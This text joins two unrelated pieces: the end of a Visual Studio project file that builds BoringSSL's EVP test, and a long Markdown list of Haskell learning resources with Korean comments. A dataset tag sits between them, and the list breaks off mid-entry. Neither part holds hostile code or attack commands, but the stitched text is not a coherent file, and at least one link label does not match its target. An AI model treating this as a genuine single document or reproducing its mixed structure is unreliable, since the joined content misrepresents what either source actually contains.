      <MinimalRebuild Condition="$(Jenkins)">false</MinimalRebuild>
    </ClCompile>
    <Link>
      <SubSystem>Windows</SubSystem>
      <GenerateDebugInformation Condition="!$(Jenkins)">true</GenerateDebugInformation>
      <GenerateDebugInformation Condition="$(Jenkins)">false</GenerateDebugInformation>
      <EnableCOMDATFolding>true</EnableCOMDATFolding>
      <OptimizeReferences>true</OptimizeReferences>
    </Link>
  </ItemDefinitionGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
    <ClCompile>
      <PrecompiledHeader>NotUsing</PrecompiledHeader>
      <WarningLevel>Level3</WarningLevel>
      <Optimization>MaxSpeed</Optimization>
      <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <FunctionLevelLinking>true</FunctionLevelLinking>
      <IntrinsicFunctions>true</IntrinsicFunctions>
      <SDLCheck>true</SDLCheck>
      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
      <TreatWarningAsError>false</TreatWarningAsError>
      <DebugInformationFormat Condition="$(Jenkins)">None</DebugInformationFormat>
      <MinimalRebuild Condition="$(Jenkins)">false</MinimalRebuild>
    </ClCompile>
    <Link>
      <SubSystem>Windows</SubSystem>
      <GenerateDebugInformation Condition="!$(Jenkins)">true</GenerateDebugInformation>
      <GenerateDebugInformation Condition="$(Jenkins)">false</GenerateDebugInformation>
      <EnableCOMDATFolding>true</EnableCOMDATFolding>
      <OptimizeReferences>true</OptimizeReferences>
    </Link>
  </ItemDefinitionGroup>
  <!-- The single source file of this library. -->
  <ItemGroup>
    <ClCompile Include="$(SolutionDir)\..\third_party\boringssl\crypto\evp\evp_test.cc">
    </ClCompile>
  </ItemGroup>
  <!-- Link against the BoringSSL library and its shared test utilities. -->
  <ItemGroup>
    <ProjectReference Include="$(SolutionDir)\..\vsprojects\vcxproj\.\boringssl_test_util\boringssl_test_util.vcxproj">
      <Project>{427037B1-B51B-D6F1-5025-AD12B200266A}</Project>
    </ProjectReference>
    <ProjectReference Include="$(SolutionDir)\..\vsprojects\vcxproj\.\boringssl\boringssl.vcxproj">
      <Project>{9FD9A3EF-C4A3-8390-D8F4-6F86C22A58CE}</Project>
    </ProjectReference>
  </ItemGroup>
  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
  <ImportGroup Label="ExtensionTargets">
  </ImportGroup>
  <Target Name="EnsureNuGetPackageBuildImports" BeforeTargets="PrepareForBuild">
    <PropertyGroup>
      <ErrorText>This project references NuGet package(s) that are missing on this computer. Enable NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.</ErrorText>
    </PropertyGroup>
  </Target>
</Project>
{ "pile_set_name": "Github" }
Haskell ======= * [**Introducing the Haskell Phrasebook**](https://typeclasses.com/news/2019-07-phrasebook) Go By Example처럼 예제로 소개 * [Monday Morning Haskell](https://mmhaskell.com/) * [school of haskell](https://www.schoolofhaskell.com/) * [fpcomplete.com](https://www.fpcomplete.com) * [tech.fpcomplete.com/haskell](https://tech.fpcomplete.com/haskell) * [fpcomplete.com/blog/topic/haskell](https://www.fpcomplete.com/blog/topic/haskell) * [Haskell Web Server in a 5MB Docker Image](https://www.fpcomplete.com/blog/2015/05/haskell-web-server-in-5mb) * [School of Haskell 2.0](https://www.fpcomplete.com/blog/2015/05/school-of-haskell-2) * [Secure package distribution: ready to roll](https://www.fpcomplete.com/blog/2015/05/secure-package-distribution) * [**Haskell and Rust**](https://www.fpcomplete.com/blog/2018/11/haskell-and-rust) * [Try Haskell](http://tryhaskell.org/) * [한국 하스켈 모임](https://haskell.kr/) * [서광열의 하스켈 블로그](http://kseo.github.io) * [haskellers.com](https://www.haskellers.com/) * [Haskell Koans for the Vancouver's Haskell UnMeetup](https://github.com/HaskVan/HaskellKoans) * [발렌타인 세미나 안내 - 순수 함수형 언어 하스켈에 대하여](https://www.youtube.com/watch?v=bTqIaEG3GHw) * [2015 나는 프로그래머다 컨퍼런스 (8,9) 박중운 - React.js & 최철웅 - Haskell 라이브코딩](https://www.youtube.com/watch?v=LP5CmzifV8I) * [케빈 TV 23회 - 언어 이야기 - 하스켈 (Haskell) 맛보기](https://www.youtube.com/watch?v=PcZez-GBiN0) * [cs-syd.eu/tags/haskell](https://cs-syd.eu/tags/haskell) * [PLEAC-Haskell](http://pleac.sourceforge.net/pleac_haskell/) * [pipes](http://hackage.haskell.org/package/pipes) * [Coq of the Haskell pipes library](https://github.com/jwiegley/coq-pipes) * [Teaching Haskell to a 10 year old: Day 1](https://superginbaby.wordpress.com/2015/04/08/teaching-haskell-to-a-10-year-old-day-1/) * [Why I love Haskell: An Example](http://thenewsh.blogspot.kr/2015/04/why-i-love-haskell-example.html) * [Functional Programming concepts, examples and patterns illustrated through Haskell 
syntax](https://github.com/caiorss/Functional-Programming) * [Blackjack: Following the Patterns](https://mmhaskell.com/blog/2020/4/27/blackjack-following-the-patterns) * [Becoming Productive in Haskell](http://mechanical-elephant.com/thoughts/2015-04-20-becoming-productive-in-haskell/) * [The Haskell School of Music -- From Signals to Symphonies](http://feedly.com/i/subscription/feed/https://news.ycombinator.com/rss) * [Haskell at Front Row](https://github.com/commercialhaskell/commercialhaskell/blob/master/usage/frontrow.md) * [The Mystical Properties of Programming, or Why I Chose Haskell](http://blog.jameslarisch.com/the-mystical-properties-of-programming-or-why-i-chose-haskell) * [**모나드 괴담**](https://e.xtendo.org/haskell/ko/monad_fear/slide#1) * [Introduction to Functional Programming](https://www.edx.org/course/introduction-functional-programming-delftx-fp101x-0) * [Functional Programming Course](https://github.com/bitemyapp/fp-course) Written by Tony Morris & Mark Hibberd for Data61 * [opentutorials.org/profile/22041](https://opentutorials.org/profile/22041) * [Haskell programmers are liars](http://www.garrisonjensen.com/2015/05/13/haskell-programs-are-lies.html) * [Learning Real Haskell Incrementally](http://begriffs.com/posts/2015-10-24-learning-haskell-incrementally.html) * [Gausian distributions form a monoid](https://izbicki.me/blog/gausian-distributions-are-monoids) * [Blazing fast Fibonacci numbers using Monoids](http://www.haskellforall.com/2020/04/blazing-fast-fibonacci-numbers-using.html) * [Monoidal Catamorphisms | Bartosz Milewski's Programming Cafe](https://bartoszmilewski.com/2020/06/15/monoidal-catamorphisms/) * [Haskell Communities and Activities Report](https://www.haskell.org/communities/05-2015/html/report.html) * [If Haskell were strict, what would the laziness be like?](http://nikita-volkov.github.io/if-haskell-were-strict/) * [haskell as a javascript MVC framework](http://tonyday567.github.io/blog/mvc-todo/) * [Making The Case For 
Haskell](http://blog.gem.co/post/119547746215/making-the-case-for-haskell) * [Thinking Functionally with Haskell](https://pragprog.com/magazines/2012-08/thinking-functionally-with-haskell) * [First-Class “Statements”](http://blog.jle.im/entry/first-class-statements) * [My First Two Weeks of Haskell at Wagon](http://www.wagonhq.com/blog/first-two-weeks-haskell-wagon) * [Haskell for OCaml programmers](http://science.raphael.poss.name/haskell-for-ocaml-programmers.html) * [Building a Quant Finance Monte Carlo Engine in Haskell - Part 1](http://boundedvariation.github.io/) * [Thinking with Laziness](http://begriffs.com/posts/2015-06-17-thinking-with-laziness.html) * [Moving Haskell processes between nodes (Transient effects IV)](https://www.fpcomplete.com/user/agocorona/moving-haskell-processes-between-nodes-transient-effects-iv) * [How Laziness Works](http://two-wrongs.com/how-laziness-works) * [Haskell programming tips](https://wiki.haskell.org/Haskell_programming_tips) * [Parallelism vs. 
Concurrency](https://wiki.haskell.org/Parallelism_vs._Concurrency) * [Tying the Knot](https://wiki.haskell.org/Tying_the_Knot) * [Fighting spam with Haskell](https://code.facebook.com/posts/745068642270222/fighting-spam-with-haskell/) * [Reviving the Gofer Standard Prelude](https://donsbot.wordpress.com/2009/01/31/reviving-the-gofer-standard-prelude-circa-1994/) * [Developing web applications with Haskell](https://docs.google.com/presentation/d/10m9zTl3Lir68VsT-yV_Ke-hvBBuq7Lj08WQ-yxElIKg/edit#slide=id.g35f391192_00) * [Perf for low-level profiling](https://www.fpcomplete.com/user/bitonic/perf-for-low-level-profiling) * [Translating Haskell to C++ metaprogramming](http://www.vandenoever.info/blog/2015/07/12/translating-haskell-to-c++.html) * [A gentle introduction to statistical relational learning: maths, code, and examples](http://phdp.github.io/posts/2015-07-13-srl-code.html) * [From Lenses to Yoneda Embedding](http://bartoszmilewski.com/2015/07/13/from-lenses-to-yoneda-embedding/) * [Haskell - Generating lenses for third party libraries](https://dev.to/piq9117/haskell-generating-lenses-for-third-party-libraries-1oik) * [Thoughts on Conduits](http://neilmitchell.blogspot.kr/2015/07/thoughts-on-conduits.html) * [Fast Nearest Neighbor Queries in Haskell](https://izbicki.me/blog/fast-nearest-neighbor-queries-in-haskell.html) * [Summer 2015 Haskell Class](https://github.com/michaelochurch/summer-2015-haskell-class) * [Haskell Source Navigation](http://begriffs.com/posts/2015-07-27-haskell-source-navigation.html) * [Automated reasoning in F#, Scala, Haskell, C++, and Julia](http://phdp.github.io/posts/2015-04-05-automated-reasoning.html) * [State of the Haskell ecosystem - August 2015](https://github.com/Gabriel439/post-rfc/blob/master/sotu.md) * [State of the Haskell ecosystem - August 2015](http://www.haskellforall.com/2015/08/state-of-haskell-ecosystem-august-2015.html) * [Building a probabilistic programming 
interpreter](http://zinkov.com/posts/2015-08-25-building-a-probabilisitic-interpreter/) * [Effectful Haskell: IO, Monads, Functors](http://slpopejoy.github.io/posts/Effectful01.html) * [Programming with distributed functional futures](http://www.macs.hw.ac.uk/~rs46/posts/2015-09-07-distributed-functional-futures.html) * [Practical Recursion Schemes](https://medium.com/@jaredtobin/practical-recursion-schemes-c10648ec1c29) * [Emulating higher order modules in Haskell](http://dnaq.github.io/2015/09/14/emulating-higher-order-modules-in-haskell/) * [2D Contouring](http://www.mattkeeter.com/projects/contours/) * [Natural Transformations](http://bartoszmilewski.com/2015/04/07/natural-transformations/) * [Three Space Leaks](http://neilmitchell.blogspot.kr/2015/09/three-space-leaks.html) * [Side Effects vs. Promises](http://www.blueskyonmars.com/2015/10/01/side-effects-vs-promises/) * [The Genuine Sieve of Eratosthenes](http://vicarie.in/posts/sieve-of-eratos.html) * [Thoughts on Haskell](http://khanlou.com/2015/10/thoughts-on-haskell/) * [Markov Chains à la Carte](https://medium.com/@jaredtobin/markov-chains-a-la-carte-3fc40df45592) * [Haskell Web Development: A Freely Available Book](https://www.indiegogo.com/projects/haskell-web-development-a-freely-available-book#/) * [Persistent data structures](http://www.toves.org/books/persist/) * [Implementing a minimal version of haskell-servant](http://www.well-typed.com/blog/2015/11/implementing-a-minimal-version-of-haskell-servant/) * [A lot of websockets in Haskell](https://blog.wearewizards.io/a-lot-of-websockets-in-haskell) * [Functors and monads for analyzing data](https://izbicki.me/blog/functors-and-monads-for-analyzing-data.html) * [Initial Algebra as Directed Colimit](https://bartoszmilewski.com/2020/04/09/initial-algebra-as-directed-colimit/) functor * [Functortown: A Map of the Territory](https://typeclasses.com/functortown) * [Haskell in ES6: Part 
1](http://casualjavascript.com/javascript/es6/haskell/native/implementation/2015/11/12/haskell-in-es6-part-1.html) * [How I deploy Haskell Code](http://www.alfredodinapoli.com/posts/2015-11-03-how-i-deploy-haskell-code.html) * [Interactive contraint solving in Haskell](http://www.mattkeeter.com/projects/constraints/) * [A Tor Implementation in Haskell](https://github.com/GaloisInc/haskell-tor) * [Anatomy of a Haskell-based Application](http://abailly.github.io/posts/cm-arch-design.html) * [The design of the Strict Haskell pragma](http://blog.johantibell.com/2015/11/the-design-of-strict-haskell-pragma.html) * [Seemingly impossible functional programs](http://math.andrej.com/2007/09/28/seemingly-impossible-functional-programs/) * [Data-Pipelines in Haskell](https://sulami.github.io/data-pipelines-in-haskell.html) * [Raytracing black holes with Haskell](https://flannelhead.github.io/projects/blackstar.html) * [Efficient binary serialization](https://www.fpcomplete.com/blog/2016/03/efficient-binary-serialization) * [Write You a Haskell - Building a modern functional compiler from first principles](http://dev.stephendiehl.com/fun/index.html) * [C9 Lectures: Dr. Erik Meijer - Functional Programming Fundamentals, Chapter 1 of 13](https://channel9.msdn.com/Series/C9-Lectures-Erik-Meijer-Functional-Programming-Fundamentals/Lecture-Series-Erik-Meijer-Functional-Programming-Fundamentals-Chapter-1) * [IX. Pattern Matching with Fragmentation Sets](http://www.youtube.com/watch?v=T15WBAWDefc) * [Short pattern matching examples using fragmentation sets](https://github.com/KedalionDaimon/patternmatching) ``` How to run (I tried to make it very easy): Pick the Scheme interpreter of your choice, e.g. 
GNU Guile, and do: guile larcom-e2.scm guile larcom-f.scm For the Haskell thing, do (assuming you have GHC): ghci :load sf2.hs From here on, you can do experiments about similiarity, like: similarity [1,2,3,4] [6,2,3,1] -- giving 40, or: similarity [0,1,1] [1,1,1,1,0] -- giving 4, or: similarity [2,2,2,2,2] [2,2,2,3,2,1] -- giving 17, etc., until you leave with: :q A higher value means greater similarity. - Essentially, these functions are made to be used in your own AI programming experiments. In future videos, I am building on these ideas. ``` * [스칼라를 이용한 개발 이후](http://hamait.tistory.com/719) * [리스트 비교하기 — 하스켈](https://medium.com/@jooyunghan/%EB%A6%AC%EC%8A%A4%ED%8A%B8-%EB%B9%84%EA%B5%90%ED%95%98%EA%B8%B0-%ED%95%98%EC%8A%A4%EC%BC%88-83b0cbf4a8b1) * [Modern Software Development with Haskell by Runar Bjarnason](https://www.youtube.com/watch?v=IKm-YYPaohQ) * [하스켈 나라 탐험기 (1)](https://harfangk.github.io/2017/04/28/my-brief-foray-into-the-land-of-haskell-1-ko.html) * [하스켈 나라 탐험기 (2)](https://harfangk.github.io/2017/05/14/my-brief-foray-into-the-land-of-haskell-2-ko.html) * [Spacemacs에서 한국어 사용하기](https://harfangk.github.io/2018/07/21/using-korean-in-spacemacs-ko.html) * [Running a startup on Haskell](https://www.youtube.com/watch?v=ZR3Jirqk6W8) * [Haskell Tutorial](https://www.youtube.com/watch?v=02_H3LjqMr8) * [Haskell Basics - FunFunFunction #35](https://www.youtube.com/watch?v=j5a9l1Td2Lo) * [Haskell - Baby's first functions - FunFunFunction #36](https://www.youtube.com/watch?v=v5AukLriIh8) * [Haskell lists - FunFunFunction #39](https://www.youtube.com/watch?v=FufhKV3dEis) * [Simon Peyton Jones - Haskell is useless](https://www.youtube.com/watch?v=iSmkqocn0oQ) * [Haskell is Not For Production and Other Tales](https://www.youtube.com/watch?v=mlTO510zO78) * [Fun never stops. 
Introduction to Haskell Programming language by Paul Szulc](https://www.youtube.com/watch?v=1jZ7j21g028) * [Haskell Live - Episode 1: The Chess Board](https://www.youtube.com/watch?v=ScS8Q32lMxA) * [Haskell Live - Episode 2: Time To Refactor](https://www.youtube.com/watch?v=6KkF5-_erns) * [Redoing Make - Haskell from Scratch #1](https://www.youtube.com/watch?v=zZ_nI9E9g0I) * [learn you a haskell](https://www.youtube.com/playlist?list=PLPqPwGvHPSZB-urE6QFjKYt6AGXcZqJUh) * [Programming - Why Haskell is Great - 10 minutes](https://www.youtube.com/watch?v=RqvCNb7fKsg) * [Easy Native GUIs in Haskell, Today!](https://www.youtube.com/watch?v=5hoQLovZBxQ) * [Fun with GHCJSi](https://www.youtube.com/watch?v=x7dQVZiWjvA) * [Functional Programming & Haskell - Computerphile](https://www.youtube.com/watch?v=LnX3B9oaKzw) * [Haskell Sucks!](https://www.youtube.com/watch?v=rvRD_LRaiRs) * [Right and left folds, primitive recursion patterns in Python and Haskell](https://eli.thegreenplace.net/2017/right-and-left-folds-primitive-recursion-patterns-in-python-and-haskell/) * [개미 수열 Haskell 풀이](https://medium.com/@jooyunghan/%EA%B0%9C%EB%AF%B8-%EC%88%98%EC%97%B4-haskell-%ED%92%80%EC%9D%B4-9799a023012) * [Learning me a Haskell for my own good](https://medium.com/@mickduprez/learning-me-a-haskell-for-my-own-good-c59eddb7f45a) * [5 Years of Haskell in Production](https://www.youtube.com/watch?v=hZgW4mT1PkE) * [Haskell 초급 예제 — todo](https://medium.com/@jooyunghan/haskell-%EC%B4%88%EA%B8%89-%EC%98%88%EC%A0%9C-todo-7faf85d45dea) * [Haskell #1 (Introduction)](https://medium.com/@goinhacker/haskell-study-1-db0a9d9ac318) * ["Building Secure Systems in Haskell" by Deian Stefan](https://www.youtube.com/watch?v=jX-zsoPWah0) * [Fixpoints in Haskell](https://medium.com/@cdsmithus/fixpoints-in-haskell-294096a9fc10) * [What Haskell taught us when we were not looking - Eric Torreborre](https://www.youtube.com/watch?v=9liCkM3bDig) * [Domain Modelling with Haskell: Data 
Structures](https://haskell-at-work.com/episodes/2018-01-19-domain-modelling-with-haskell-data-structures.html) * [**agbird.egloos.com/category/하스켈 스프링노트**](http://agbird.egloos.com/category/%ED%95%98%EC%8A%A4%EC%BC%88%20%EC%8A%A4%ED%94%84%EB%A7%81%EB%85%B8%ED%8A%B8) * [core-lang-haskell](https://github.com/Ailrun/core-lang-haskell) * [LINE 하스켈 부트 캠프](https://engineering.linecorp.com/ko/blog/line-haskell-boot-camp/) * [An opinionated guide to Haskell in 2018](https://lexi-lambda.github.io/blog/2018/02/10/an-opinionated-guide-to-haskell-in-2018) * [reasonablypolymorphic.com/blog/archives](http://reasonablypolymorphic.com/blog/archives/) * [Functional Programming for the Long Haul](https://www.youtube.com/watch?v=4Q9WUrelSng) * [24 Days of GHC Extensions](https://ocharles.org.uk/pages/2014-12-01-24-days-of-ghc-extensions.html) * [A Guide to GHC's Extensions](https://limperg.de/ghc-extensions/) * [EXTENSIONS](https://kowainik.github.io/posts/extensions) * [Tackling the awkward squad: monadic input/output, concurrency, exceptions, and foreign-language calls in Haskell](https://www.microsoft.com/en-us/research/publication/tackling-awkward-squad-monadic-inputoutput-concurrency-exceptions-foreign-language-calls-haskell/?from=http%3A%2F%2Fresearch.microsoft.com%2Fen-us%2Fum%2Fpeople%2Fsimonpj%2Fpapers%2Fmarktoberdorf%2Fmark.pdf) * [Programming Nirvana, Plan B](http://wordaligned.org/articles/programming-nirvana-plan-b) * [Covariance and Contravariance](https://www.fpcomplete.com/blog/2016/11/covariance-contravariance) * [**공변성과 반공변성은 무엇인가?**](https://edykim.com/ko/post/what-is-coercion-and-anticommunism/) * [Coroutine.hs](https://github.com/damhiya/Coroutine/blob/master/Control/Monad/Coroutine.hs) * [Data.Proxy](https://kseo.github.io/posts/2017-01-15-data-proxy.html) * [Elm Town 47 - A Cool, Easy Way To Start Learning Haskell](https://elmtown.simplecast.fm/a-cool-easy-way-to-start-learning-haskell) * [Adding Interactivity with 
Elm!](https://mmhaskell.com/blog/2020/2/18/addin) * ["A history of Haskell: being lazy with class"를 읽고](https://www.sangkon.com/study-a-history-of-haskell-part1/) * [Worst practices should be hard](http://www.haskellforall.com/2016/04/worst-practices-should-be-hard.html) * [knapsack.hs](https://gist.github.com/harfangk/9ec016c3a8dc88d3e10cc7348b33be24) * [Why hasn't functional programming taken over object-oriented programming?](https://www.quora.com/Why-hasnt-functional-programming-taken-over-object-oriented-programming) * [How does Haskell avoid stack overflow when non tail recursion is required?](https://www.quora.com/How-does-Haskell-avoid-stack-overflow-when-non-tail-recursion-is-required) * [What are the advantages and disadvantages of using Haskell to implement a domain specific language?](https://www.quora.com/What-are-the-advantages-and-disadvantages-of-using-Haskell-to-implement-a-domain-specific-language) * [Can the Haskell compiler automatically convert a recursive function that is not tail-recursive into a tail-recursive function using the continuation-passing style technique or some other technique?](https://www.quora.com/Can-the-Haskell-compiler-automatically-convert-a-recursive-function-that-is-not-tail-recursive-into-a-tail-recursive-function-using-the-continuation-passing-style-technique-or-some-other-technique) * [Defunctionalize the Continuation](https://www.cis.upenn.edu/~plclub/blog/2020-05-15-Defunctionalize-the-Continuation/) * [boxbase.org: Continuations for normalising sum types](https://boxbase.org/entries/2020/may/25/cps-nbe/) * [What does the flip function do in Haskell?](https://www.quora.com/What-does-the-flip-function-do-in-Haskell) * [How fast is Haskell?](https://www.quora.com/How-fast-is-Haskell) * [What are the most famous software written in Haskell and why aren't there more? I know of xmonad and that Standard Chartered used it in production. 
Are there others?](https://www.quora.com/What-are-the-most-famous-software-written-in-Haskell-and-why-arent-there-more-I-know-of-xmonad-and-that-Standard-Chartered-used-it-in-production-Are-there-others) * [zip.hs](https://gist.github.com/nattybear/be2ec4a55b94a2504ca813727ffb5a5b) * [zip.py](https://gist.github.com/nattybear/df6d7dfdacb588c271857a6219f9c914) * [Functional Programming And Formal Software Verification For Non Industry Applications - Or - Why you should learn Haskell and Coq](https://medium.com/@fabian.schneider/functional-programming-and-formal-software-verification-for-non-industry-applications-fefa24371856) * [github.com/leechanwoo/APSS/tree/master/haskell](https://github.com/leechanwoo/APSS/tree/master/haskell) * [Typing the technical interview](https://aphyr.com/posts/342-typing-the-technical-interview) * [Flunking the Coding Interview: Choose the wrong algorithm and still pass your coding interview](https://maxfieldchen.com/posts/2020-05-09-Code-Interview-Haskell-1.html) * [Advent of Haskell - Thoughts and lessons learned after using Haskell consistently for 25 days in a row](https://medium.com/@mvaldesdeleon/advent-of-haskell-950d6408a729) * [Do-notation considered harmful](https://syntaxfree.wordpress.com/2006/12/12/do-notation-considered-harmful/) * [ContinuationMore.ipynb](https://github.com/hnu-pl/grad-pl2019fall/blob/master/hsnote/ContinuationMore.ipynb) * [Memoization in Haskell](https://kseo.github.io/posts/2017-01-14-memoization-in-hasekll.html) * [Lazy Dynamic Programming](http://jelv.is/blog/Lazy-Dynamic-Programming/) * [The Evolution of a Haskell Programmer](https://willamette.edu/~fruehr/haskell/evolution.html) 유머라는데 하스켈 프로그래머들만 알아듣는 듯 * [Sonic 2 in Haskell: Playing with sprites](https://www.youtube.com/watch?v=lm-8sbFFV24) * [MatchString.hs](https://gist.github.com/ghjang/d8b5542730d64fbbc8268279431b3780) * [Regex?](https://rextester.com/PTSLI74648) * [Fighting spam with 
Haskell](https://engineering.fb.com/security/fighting-spam-with-haskell/) * [Micro C, Part 0](https://blog.josephmorag.com/posts/mcc0/) * [Micro C, Part 1](https://blog.josephmorag.com/posts/mcc1/) * [Micro C, Part 2: Semantic Analysis](https://blog.josephmorag.com/posts/mcc2/) * [Micro C, Part 3: Generating LLVM](https://blog.josephmorag.com/posts/mcc3/) * [Micro C, Part 4: Integrating the LLVM FFI](https://blog.josephmorag.com/posts/mcc4/) * [Polymorphic Perplexion](https://ucsd-progsys.github.io/liquidhaskell-blog/2020/04/12/polymorphic-perplexion.lhs/) * [Streaming the Redis replication stream](https://wjwh.eu/posts/2020-04-12-redis-conduit.html) * [Towards Faster Iteration in Industrial Haskell](https://blog.sumtypeofway.com/posts/fast-iteration-with-haskell.html) * [Performance comparison of parallel ray tracing in functional programming languages](https://github.com/athas/raytracers) * [Continuous Integration in Haskell](https://medium.com/@_KtorZ_/continuous-integration-in-haskell-9ad2a73e8e46) * [Is Haskell a Bad Choice?](https://blog.bojo.wtf/management/2020/04/15/is-haskell-a-bad-choice.html) * [PERMISSIVE, THEN RESTRICTIVE: LEARNING HOW TO DESIGN HASKELL PROGRAMS](https://williamyaoh.com/posts/2020-04-19-permissive-vs-restrictive.html) * [Syntactic ambiguity resolution in the GHC parser](https://blog.shaynefletcher.org/2020/04/syntactic-ambiguity-resolution-in-ghc.html) * [Consider Haskell](https://gilmi.me/blog/post/2020/04/28/consider-haskell) * [DERIVING ISOMORPHICALLY](https://www.tweag.io/posts/2020-04-23-deriving-isomorphically.html) * [Learn to moonwalk with waterflow problem](https://iokasimov.github.io/posts/2020/04/waterflow) * [Speeding up the Sixty compiler](https://ollef.github.io/blog/posts/speeding-up-sixty.html) * [Haskell on AWS Lambda - A Detailed Tutorial](https://www.haskelltutorials.com/haskell-aws-lambda/) * [Environment variables parsing for free 
(applicatives)](https://tech.fretlink.com/environment-variables-parsing-for-free-applicatives/) * [Intervals and their relations](https://marcosh.github.io/post/2020/05/04/intervals-and-their-relations.html) * [jmtd → log → template haskell](https://jmtd.net/log/template_haskell/) * [How many function arguments?](https://jmtd.net/log/how_many_arguments/) * [using Template Haskell to generate boilerplate](https://jmtd.net/log/template_haskell/boilerplate/) * [Template Haskell and Stream-processing programs](https://jmtd.net/log/template_haskell/streamgraph/) * [Frozen Lake in Haskell](https://mmhaskell.com/blog/2020/4/20/frozen-lake-in-haskell) * [More Random Access Lists](https://doisinkidney.com/posts/2020-05-02-more-random-access-lists.html) * [A TASTE OF BAZEL: BUILD A LIBRARY, A SERVICE AND HSPEC TESTS](https://www.tweag.io/posts/2020-05-06-convert-haskell-project-to-bazel.html) * [REANIMATE: SWEARING AT BAD DOCUMENTATION](https://williamyaoh.com/posts/2020-05-10-reanimate-an-experience-report.html) * [The State of Haskell IDEs](https://mpickering.github.io/ide/posts/2020-05-08-state-of-haskell-ide.html) * [Hereditary substitutions](https://boxbase.org/entries/2020/may/11/hereditary_substitutions/) * [Book "Functional Design and Architecture"](https://np.reddit.com/r/haskell/comments/gmxfqz/book_functional_design_and_architecture/) * [GHC Unproposals](https://neilmitchell.blogspot.com/2020/05/ghc-unproposals.html) * [Implementing Clean Architecture with Haskell and Polysemy](https://github.com/thma/PolysemyCleanArchitecture/) * [Competitive programming in Haskell: summer series](https://byorgey.wordpress.com/2020/05/16/competitive-programming-in-haskell-summer-series/) * [DerivingVia sums-of-products](https://iceland_jack.brick.do/e28e745c-40b8-4b0b-8148-1f1ae0c32d43) * [Frozen Lake with Q-Learning!](https://mmhaskell.com/blog/2020/5/4/frozen-lake-with-q-learning) * [Functional Fika — Nix and 
Haskell:](https://maxfieldchen.com/posts/2020-05-16-Functional-Fika-Haskell-Nix-Cabal.html) * [Monoidal Puzzle Solving](https://jonascarpay.com/posts/2020-05-26-solver.html) * [Well-Typed - The Haskell Consultants: Profiling Template Haskell splices](https://www.well-typed.com/blog/2020/05/profiling-template-haskell/) * [Well-Typed - The Haskell Consultants: Using Template Haskell to generate static data](https://www.well-typed.com/blog/2020/06/th-for-static-data/) * [Running HLint as a GHC source plugin - DEV](https://dev.to/tfausak/running-hlint-as-a-ghc-source-plugin-17dl) * [Simple Haskell is Best Haskell](https://medium.com/@fommil/simple-haskell-is-best-haskell-6a1ea59c73b) * [Building a Haskell Microservice](https://twonki.github.io/haskell-microservice/) * [Competitive programming in Haskell: building unordered trees](https://byorgey.wordpress.com/2020/05/22/competitive-programming-in-haskell-building-unordered-trees/) * [Maxfield Chen - Dynamically Flunking the Coding Interview](https://maxfieldchen.com/posts/2020-05-23-Dynamically-Flunking-Code-Interview-Haskell.html) * [Oleg's gists - Evolving non-determinism](https://oleg.fi/gists/posts/2020-05-26-evolving-non-determinism.html) * [Generalizing Our Environments](https://mmhaskell.com/blog/2020/5/11/generalizing-our-environments) * [Setting up a Haskell development environment with Nix](https://romainviallard.dev/en/blog/setting-up-a-haskell-development-environment-with-nix/) * [Deploying your application with NixOS](https://romainviallard.dev/en/blog/deploying-your-app-with-nixos/) * [YourFirstGame with Haskell, Godot, and godot-haskell](https://spartanengineer.com/posts/2020-05-24-yourfirstgame-with-haskell-and-godot.html) * [Simply typed lambda calculus](https://splintah.gitlab.io/posts/2020-05-24-Simply-typed-lambda.html) * [Subgame perfection made difficult](https://julesh.com/2020/05/26/subgame-perfection-made-difficult/) * [Update 
Everything](https://funwithfunctions.com/posts/2020-05-24-update-everything.html) * [Making Music with Haskell From Scratch](https://www.youtube.com/watch?feature=youtu.be&v=FYTZkE5BZ-0) * [Adventures in Refactoring](https://samtay.github.io/posts/refactoring-adventures) * [Building a reactive calculator in Haskell (1/5)](https://keera.co.uk/2020/05/28/building-a-reactive-calculator-in-haskell-1-5/) * [Building a reactive calculator in Haskell (2/5)](https://keera.co.uk/2020/05/30/building-a-reactive-calculator-in-haskell-2-5/) * [Building a reactive calculator in Haskell (3/5)](https://keera.co.uk/2020/06/02/building-a-reactive-calculator-in-haskell-3-5/) * [Building a reactive calculator in Haskell (4/5) – Keera Studios](https://keera.co.uk/2020/06/09/building-a-reactive-calculator-in-haskell-4-5/) * [Building a reactive calculator in Haskell (5/5) – Keera Studios](https://keera.co.uk/2020/06/16/building-a-reactive-calculator-in-haskell-5-5/) * [Generating documentation from API types](https://holmusk.dev/blog/2020-05-18-Generating-documentation-from-API-types.html) * [Quick Memory Trick](https://www.parsonsmatt.org/2020/06/01/quick_memory_trick.html) * [Reanimate: a tutorial on making programmatic animations](https://williamyaoh.com/posts/2020-05-31-reanimate-nqueens-tutorial.html) * [The abstract nature of the Cardano consensus layer](https://iohk.io/en/blog/posts/2020/05/28/the-abstract-nature-of-the-consensus-layer/) * [CircleCI and Haskell](https://dev.to/codenoodle/circleci-and-haskell-46g6) * [Cleaning up threads in Haskell](https://chrismwendt.github.io/blog/2020/05/31/cleaning-up-threads-in-haskell.html) * [CodeWorld as a Haskell Playground: Call for Package Requests](https://medium.com/@cdsmithus/codeworld-as-a-haskell-playground-call-for-package-requests-3b9ae3bcd840) * [Competitive programming in Haskell: permutations](https://byorgey.wordpress.com/2020/05/30/competitive-programming-in-haskell-permutations/) * [Function 
